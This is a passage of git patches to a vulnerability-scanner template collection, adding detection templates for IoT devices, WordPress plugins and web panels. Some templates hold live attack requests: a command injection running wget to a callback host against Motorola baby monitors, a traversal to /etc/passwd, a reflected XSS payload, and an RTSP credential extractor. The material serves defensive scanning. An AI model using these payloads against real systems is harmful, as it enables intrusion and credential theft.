description: openvpn-monitor is a simple python program to generate html that displays the status of an OpenVPN server, including all current connections. - reference: https://openvpn-monitor.openbytes.ie/ author: geeknik severity: high - tags: openvpn,disclosure + description: openvpn-monitor is a simple python program to generate html that displays the status of an OpenVPN server, including all current connections. + reference: https://openvpn-monitor.openbytes.ie/ + tags: openvpn,disclosure,panel requests: - method: GET @@ -19,6 +19,7 @@ requests: - type: status status: - 200 + - type: word part: body words: @@ -27,6 +28,7 @@ requests: - 'VPN IP' - 'Remote IP' condition: and + - type: word part: header words: From f35db18633a3004796d232fa86bf710f4261545d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 00:47:37 +0530 Subject: [PATCH 2500/4083] Update and rename wp-plugin-issuu-panel-lfi.yaml to vulnerabilities/wordpress/issuu-panel-lfi.yaml --- .../wordpress/issuu-panel-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename wp-plugin-issuu-panel-lfi.yaml => vulnerabilities/wordpress/issuu-panel-lfi.yaml (89%) diff --git a/wp-plugin-issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml similarity index 89% rename from wp-plugin-issuu-panel-lfi.yaml rename to vulnerabilities/wordpress/issuu-panel-lfi.yaml index 1c73990b13..72c7d0ec70 100644 --- a/wp-plugin-issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -1,11 +1,11 @@ -id: wp-plugin -issuu-panel-lfi +id: issuu-panel-lfi info: name: Wordpress Plugin Issuu Panel - RFI & LFI author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2016030131 - tags: wp,wordpress,lfi + tags: wp-plugin,wordpress,lfi requests: - method: GET From e832a50401e9cd79f4fe44ccb5e7446b21aeca28 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 00:49:53 +0530 Subject: [PATCH 2501/4083] Update issuu-panel-lfi.yaml --- vulnerabilities/wordpress/issuu-panel-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 72c7d0ec70..079a043e95 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://cxsecurity.com/issue/WLB-2016030131 - tags: wp-plugin,wordpress,lfi + tags: wp-plugin,wordpress,lfi,rfi requests: - method: GET From 624c722c5a0b16a6f8b7750a3e8d3b9847b01945 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 00:51:56 +0530 Subject: [PATCH 2502/4083] Update and rename wp-brandfolder-plugin-lfi.yaml to vulnerabilities/wordpress/brandfolder-lfi.yaml --- .../wordpress/brandfolder-lfi.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename wp-brandfolder-plugin-lfi.yaml => vulnerabilities/wordpress/brandfolder-lfi.yaml (86%) diff --git a/wp-brandfolder-plugin-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml similarity index 86% rename from wp-brandfolder-plugin-lfi.yaml rename to vulnerabilities/wordpress/brandfolder-lfi.yaml index f57fc00d47..54d3abbe1b 100644 --- a/wp-brandfolder-plugin-lfi.yaml +++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -1,13 +1,13 @@ -id: wp-plugins-brandfolder-plugin-lfi +id: brandfolder-lfi info: - name: Wordpress brandfolder plugin / RFI & LFI + name: Wordpress brandfolder plugin - RFI & LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi,rfi reference: - https://www.exploit-db.com/exploits/39591 - https://cxsecurity.com/issue/WLB-2016030120 + tags: wordpress,wp-plugin,lfi,rfi requests: - method: GET From f70cc70c26f825f7cc7bae06cc9d9169db268558 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 00:54:03 +0530 Subject: [PATCH 2503/4083] Update and rename wp-brandfolder-plugin-open-redirect.yaml to vulnerabilities/wordpress/brandfolder-open-redirect.yaml --- .../wordpress/brandfolder-open-redirect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename wp-brandfolder-plugin-open-redirect.yaml => vulnerabilities/wordpress/brandfolder-open-redirect.yaml (87%) diff --git a/wp-brandfolder-plugin-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml similarity index 87% rename from wp-brandfolder-plugin-open-redirect.yaml rename to vulnerabilities/wordpress/brandfolder-open-redirect.yaml index c232f15785..5811edcd94 100644 --- a/wp-brandfolder-plugin-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -1,11 +1,11 @@ -id: wp-brandfolder-plugin-open-redirect +id: brandfolder-open-redirect info: name: Wordpress brandfolder plugin Open Redirect author: 0x_Akoko - reference: https://www.exploit-db.com/exploits/39591 severity: low - tags: wp,redirect + reference: https://www.exploit-db.com/exploits/39591 + tags: wordpress,wp-plugin,lfi,rfi requests: - method: GET From 7d57a07d8659c1a22146c49158c32ba32bb852ed Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 25 Sep 2021 08:13:24 +0900 Subject: [PATCH 2504/4083] Create CVE-2021-3577.yaml Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-3577.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-3577.yaml diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml new file mode 100644 index 0000000000..b196ed7f2e --- /dev/null +++ b/cves/2021/CVE-2021-3577.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-3577 + +info: + name: Motorola Baby Monitors Unauthenticated RCE + description: Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: + - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ + tags: cve,cve2021,baby,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3577 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 59e0eb7ad3d45370f03b68a67cace684a9c0a656 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 25 Sep 2021 08:39:05 +0900 Subject: [PATCH 2505/4083] Create commax-cctv-rtsp-credentials-disclosure.yaml The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text. Signed-off-by: GwanYeong Kim --- ...mmax-cctv-rtsp-credentials-disclosure.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml diff --git a/vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml b/vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml new file mode 100644 index 0000000000..a1bdfe034d --- /dev/null +++ b/vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml @@ -0,0 +1,23 @@ +id: commax-cctv-rtsp-credentials-disclosure + +info: + name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure + author: gy741 + severity: critical + description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + tags: commax,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/overview.asp" + + matchers: + - type: word + words: + - "DVR Lists" + - "rtsp://" + - "login_check.js" + condition: and From fac7f96b342abba0eb37d570fc51e3c03f0cf9a7 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 25 Sep 2021 08:58:58 +0900 Subject: [PATCH 2506/4083] Create ecoa-building-directory-traversal.yaml The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device Signed-off-by: GwanYeong Kim --- .../ecoa-building-directory-traversal.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/other/ecoa-building-directory-traversal.yaml diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-directory-traversal.yaml new file mode 100644 index 0000000000..0fa43d3146 --- /dev/null +++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml @@ -0,0 +1,23 @@ +id: ecoa-building-directory-traversal + +info: + name: ECOA Building Automation System - Directory Traversal Content Disclosure + author: gy741 + severity: high + description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + tags: ecoa,traversal + +requests: + - raw: + - | + GET /fmangersub?cpath=/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + words: + - "bacevent.elf" + - "redown.elf" + - "system.bin" + condition: and From ae58e1e6129dfa5de121d8254d39c241bc83c480 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 25 Sep 2021 07:49:53 +0700 Subject: [PATCH 2507/4083] Create CVE-2014-4544.yaml --- cves/2014/CVE-2014-4544.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-4544.yaml diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml new file mode 100644 index 0000000000..a8380ef6d9 --- /dev/null +++ b/cves/2014/CVE-2014-4544.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4544 + +info: + name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb + - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From e339d5a0e83641840cf99697a7d77c8502bca854 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 11:19:46 +0530 Subject: [PATCH 2508/4083] Update CVE-2014-4544.yaml --- cves/2014/CVE-2014-4544.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml index a8380ef6d9..1d16c52c78 100644 --- a/cves/2014/CVE-2014-4544.yaml +++ b/cves/2014/CVE-2014-4544.yaml @@ -4,6 +4,7 @@ info: name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS author: daffainfo severity: medium + description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 @@ -12,13 +13,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E&" + - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" matchers-condition: and matchers: - type: word words: - - "'>" + - "" part: body - type: word From 2e7e35eb70d295698132a42ac2b297b9d5be9e5c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 11:22:48 +0530 Subject: [PATCH 2509/4083] Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml --- ...ory-traversal.yaml => ecoa-building-lfi.yaml} | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) rename vulnerabilities/other/{ecoa-building-directory-traversal.yaml => ecoa-building-lfi.yaml} (67%) diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-lfi.yaml similarity index 67% rename from vulnerabilities/other/ecoa-building-directory-traversal.yaml rename to vulnerabilities/other/ecoa-building-lfi.yaml index 0fa43d3146..fcaa63183d 100644 --- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml +++ b/vulnerabilities/other/ecoa-building-lfi.yaml @@ -1,4 +1,4 @@ -id: ecoa-building-directory-traversal +id: ecoa-building-lfi info: name: ECOA Building Automation System - Directory Traversal Content Disclosure @@ -6,18 +6,16 @@ info: severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - tags: ecoa,traversal + tags: ecoa,lfi requests: - raw: - | - GET /fmangersub?cpath=/ HTTP/1.1 + GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} matchers: - - type: word - words: - - "bacevent.elf" - - "redown.elf" - - "system.bin" - condition: and + - type: regex + regex: + - "root:.*:0:0:" + part: body From 09a75b8d74173ef06f9d1feb13271ba578f0b95b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 11:28:27 +0530 Subject: [PATCH 2510/4083] Update CVE-2021-3577.yaml --- cves/2021/CVE-2021-3577.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml index b196ed7f2e..df563b47c3 100644 --- a/cves/2021/CVE-2021-3577.yaml +++ b/cves/2021/CVE-2021-3577.yaml @@ -2,17 +2,18 @@ id: CVE-2021-3577 info: name: Motorola Baby Monitors Unauthenticated RCE - description: Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 severity: critical + description: Vulnerabilities in the interface of Motorola Baby Monitors could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/ - tags: cve,cve2021,baby,rce,oob + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-3577 cwe-id: CWE-78 + tags: cve,cve2021,rce,oob,motorola,iot requests: - raw: From 2808f464291b4d4802e116ad1acb80052955360f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 11:32:31 +0530 Subject: [PATCH 2511/4083] Update and rename commax-cctv-rtsp-credentials-disclosure.yaml to commax-credentials-disclosure.yaml --- ...ure.yaml => commax-credentials-disclosure.yaml} | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) rename vulnerabilities/other/{commax-cctv-rtsp-credentials-disclosure.yaml => commax-credentials-disclosure.yaml} (61%) diff --git a/vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml b/vulnerabilities/other/commax-credentials-disclosure.yaml similarity index 61% rename from vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml rename to vulnerabilities/other/commax-credentials-disclosure.yaml index a1bdfe034d..bbce1d74c0 100644 --- a/vulnerabilities/other/commax-cctv-rtsp-credentials-disclosure.yaml +++ b/vulnerabilities/other/commax-credentials-disclosure.yaml @@ -1,13 +1,12 @@ -id: commax-cctv-rtsp-credentials-disclosure +id: commax-credentials-disclosure info: name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure author: gy741 severity: critical description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php - tags: commax,exposure + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + tags: commax,exposure,camera,iot requests: - method: GET @@ -20,4 +19,11 @@ requests: - "DVR Lists" - "rtsp://" - "login_check.js" + - "MAX USER :" condition: and + + extractors: + - type: regex + part: body + regex: + - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann' From 7b6eec4b5aec5b7ef7b640e72274a68e5882cfbe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 25 Sep 2021 06:20:52 +0000 Subject: [PATCH 2512/4083] Auto Generated CVE annotations [Sat Sep 25 06:20:52 UTC 2021] :robot: --- cves/2014/CVE-2014-4544.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2014/CVE-2014-4544.yaml b/cves/2014/CVE-2014-4544.yaml index 1d16c52c78..9db25c6960 100644 --- a/cves/2014/CVE-2014-4544.yaml +++ b/cves/2014/CVE-2014-4544.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4544 + cwe-id: CWE-79 requests: - method: GET From 8fe56e7173d67805f86c16cc44145538abafead2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 13:40:39 +0530 Subject: [PATCH 2513/4083] Create automation-direct.yaml --- iot/automation-direct.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/automation-direct.yaml diff --git a/iot/automation-direct.yaml b/iot/automation-direct.yaml new file mode 100644 index 0000000000..50a972a06e --- /dev/null +++ b/iot/automation-direct.yaml @@ -0,0 +1,25 @@ +id: automation-direct + +info: + name: Automation Direct + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7295 + tags: panel,iot + metadata: + shodan-dork: http.title:"C-more -- the best HMI presented by AutomationDirect" + +requests: + - method: GET + path: + - '{{BaseURL}}/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - "C-more -- the best HMI presented by AutomationDirect" + + - type: status + status: + - 200 From 2600bdf23eb0489bdf80c97324af3a3291d4e350 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:05:09 +0530 Subject: [PATCH 2514/4083] Create tileserver-gl.yaml --- technologies/tileserver-gl.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/tileserver-gl.yaml diff --git a/technologies/tileserver-gl.yaml b/technologies/tileserver-gl.yaml new file mode 100644 index 0000000000..ce82ed0f7a --- /dev/null +++ b/technologies/tileserver-gl.yaml @@ -0,0 +1,25 @@ +id: tileserver-gl + +info: + name: TileServer GL + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7296 + tags: tech + metadata: + shodan-dork: http.title:"TileServer GL - Server for vector and raster maps with GL styles" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "TileServer GL - Server for vector and raster maps with GL styles" + + - type: status + status: + - 200 From 423bd1281720952399b9a0de04d5aa9f93dfe16a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:14:48 +0530 Subject: [PATCH 2515/4083] Create netsurveillance-web.yaml --- iot/netsurveillance-web.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/netsurveillance-web.yaml diff --git a/iot/netsurveillance-web.yaml b/iot/netsurveillance-web.yaml new file mode 100644 index 0000000000..914688bcdd --- /dev/null +++ b/iot/netsurveillance-web.yaml @@ -0,0 +1,25 @@ +id: netsurveillance-web + +info: + name: NETSurveillance WEB + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7288 + tags: tech + metadata: + shodan-dork: http.title:"NETSurveillance WEB" + +requests: + - method: GET + path: + - '{{BaseURL}}/Login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - "NetSuveillanceWebCookie" + + - type: status + status: + - 200 From af09692c338383d6375bc68ebe513e156dae9cd3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:18:27 +0530 Subject: [PATCH 2516/4083] Create new-web-server.yaml --- technologies/new-web-server.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/new-web-server.yaml diff --git a/technologies/new-web-server.yaml b/technologies/new-web-server.yaml new file mode 100644 index 0000000000..d1060d287d --- /dev/null +++ b/technologies/new-web-server.yaml @@ -0,0 +1,25 @@ +id: new-web-server + +info: + name: Web Server Detection + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7291 + tags: tech + metadata: + shodan-dork: html:"Your new web server is ready to use." + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Your new web server is ready to use." + + - type: status + status: + - 200 From d91b9882a64844afd0e46e63b3094960524f05ef Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:22:30 +0530 Subject: [PATCH 2517/4083] Create amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/amcrest-login.yaml diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml new file mode 100644 index 0000000000..ad2f5a07fd --- /dev/null +++ b/exposed-panels/amcrest-login.yaml @@ -0,0 +1,26 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7273 + tags: tech + metadata: + shodan-dork: html:"amcrest" + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "amcrest" + - "LDAP User" + + - type: status + status: + - 200 From f300a7371d3b28819ad1c58db38b93b290307957 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:25:40 +0530 Subject: [PATCH 2518/4083] Update amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index ad2f5a07fd..de26517ac4 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7273 - tags: tech + tags: panel metadata: shodan-dork: html:"amcrest" From c83f83bc315b732da7e8ce74893396e19ce27c7a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 26 Sep 2021 14:25:58 +0530 Subject: [PATCH 2519/4083] Create intelbras-login.yaml --- exposed-panels/intelbras-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/intelbras-login.yaml diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml new file mode 100644 index 0000000000..21942ef9d4 --- /dev/null +++ b/exposed-panels/intelbras-login.yaml @@ -0,0 +1,25 @@ +id: intelbras-login + +info: + name: Intelbras Login + author: DhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7272 + tags: panel + metadata: + shodan-dork: http.title:"Intelbras" + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - "Intelbras" + + - type: status + status: + - 200 From dc3ee1128e9a978fa7c7f4c9643cd69d29629096 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 26 Sep 2021 16:36:42 +0530 Subject: [PATCH 2520/4083] Update amcrest-login.yaml --- exposed-panels/amcrest-login.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/amcrest-login.yaml b/exposed-panels/amcrest-login.yaml index de26517ac4..c481ebd0b3 100644 --- a/exposed-panels/amcrest-login.yaml +++ b/exposed-panels/amcrest-login.yaml @@ -5,9 +5,10 @@ info: author: DhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7273 - tags: panel metadata: shodan-dork: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera requests: - method: GET @@ -18,8 +19,9 @@ requests: matchers: - type: word words: - - "amcrest" - - "LDAP User" + - "Amcrest Technologies" + - "LDAPUser" + condition: and - type: status status: From 25b9856b10ca743ec37d3a4eb6fdb68ec85cc222 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 27 Sep 2021 15:17:12 +0530 Subject: [PATCH 2521/4083] Create fingerprinthub-web-fingerprints.yaml --- .../fingerprinthub-web-fingerprints.yaml | 17808 ++++++++++++++++ 1 file changed, 17808 insertions(+) create mode 100644 technologies/fingerprinthub-web-fingerprints.yaml diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml new file mode 100644 index 0000000000..c47e4652f0 --- /dev/null +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -0,0 +1,17808 @@ +id: fingerprinthub-web-fingerprints +info: + name: FingerprintHub Technology Fingerprint + author: pdteam + severity: info + reference: https://github.com/0x727/FingerprintHub/blob/main/web_fingerprint_v2.json + tags: tech + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: or + matchers: + - type: word + name: 08cms + words: + - typeof(_08cms) + + - type: word + condition: and + name: 1caitong + words: + - /custom/groupnewslist.aspx?groupid= + + - type: word + condition: and + name: 21grid + words: + - 技术支持:网格(福建)智能科技有限公司 + + - type: word + condition: and + name: 263-enterprise-mailbox + words: + - net263.wm.custom_login.homepage_init + + - type: word + condition: and + name: 263-enterprise-mailbox + words: + - src="/custom_login/js/net263_wm_util.js + + - type: word + condition: and + name: 263-hrm + words: + -

    请使用263em登陆!

    + + - type: word + condition: and + name: 263-meeting + words: + - + + - type: word + condition: and + name: 315soft-filesystem + words: + - '>多可电子档案管理系统 + + - type: word + condition: and + name: 360-tianqing + words: + - appid":"skylar6 + + - type: word + condition: and + name: 360-tianqing + words: + - /task/index/detail?id={item.id} + + - type: word + condition: and + name: 360-tianqing + words: + - 已过期或者未授权,购买请联系4008-136-360 + + - type: word + condition: and + name: 360-webscan + words: + - webscan.360.cn/status/pai/hash + + - type: word + condition: and + name: 365webcall + words: + - src='http://www.365webcall.com/imme1.aspx? + + - type: word + condition: and + name: 365xxy-examing + words: + - href=https://unpkg.com/element-ui/lib/theme-chalk/index.css + + - type: word + condition: and + name: 365xxy-examing + words: + - 云时政在线考试系统 + + - type: word + condition: and + name: 3dcart + words: + - powered by 3dcart + + - type: word + condition: and + part: header + name: 3dcart + words: + - 'X-Powered-By: 3dcart' + + - type: word + condition: and + name: 3kits-cms + words: + - 3kits + + - type: word + condition: and + name: 3kits-cms + words: + - href="http://www.3kits.com" + + - type: word + condition: and + name: 42gears-suremdm + words: + - astrocontacts + - suremdm + + - type: word + condition: and + name: 53kf + words: + - chat.53kf.com/company.php + - chat.53kf.com/kf.php + + - type: word + condition: and + name: 53kf + words: + - powered by 53kf + + - type: word + condition: and + name: 53kf + words: + - tb.53kf.com/code/ + + - type: word + condition: and + name: 54-customer-service + words: + - src="http://code.54kefu.net/ + + - type: word + condition: and + name: 5ikq + words: + - content="我爱考勤云平台 + + - type: word + condition: and + name: 5ikq + words: + - 我爱考勤云平台 + + - type: word + condition: and + name: 5k-crm + words: + - /public/js/5kcrm.js + + - type: word + condition: and + name: 5vtechnologies-blueangelsoftwaresuite + words: + - /cgi-bin/webctrl.cgi?action=index_page + + - type: word + condition: and + name: 6kbbs + words: + - powered by 6kbbs + + - type: word + condition: and + name: 6kbbs + words: + - generator" content="6kbbs + + - type: word + condition: and + name: 74cms + words: + - content="74cms.com" + + - type: word + condition: and + name: 74cms + words: + - content="74cms.com + + - type: word + condition: and + name: 74cms + words: + - content="骑士cms + + - type: word + condition: and + name: 74cms + words: + - powered by 78OA办公系统 + + - type: word + condition: and + name: 78oa + words: + - /resource/javascript/system/runtime.min.js + + - type: word + condition: and + name: 78oa + words: + - license.78oa.com + + - type: word + condition: and + name: 7moor-product + words: + - class="ds_do_action domain_aboutus" + + - type: word + condition: and + name: 7moor-product + words: + - /javascripts/qiniu/qiniu.js + + - type: word + condition: and + part: header + name: a2b-webserver + words: + - 'Server: a2b webserver' + + - type: word + condition: and + name: aakuan-attendance-system + words: + - href="scripts/popmodal.css" + + - type: word + condition: and + name: aakuan-attendance-system + words: + - aakuan.cn + + - type: word + condition: and + name: aardvark-topsites + words: + - aardvark topsites + + - type: word + condition: and + name: accellion-secure-file-transfer + words: + - secured by accellion + + - type: word + condition: and + name: 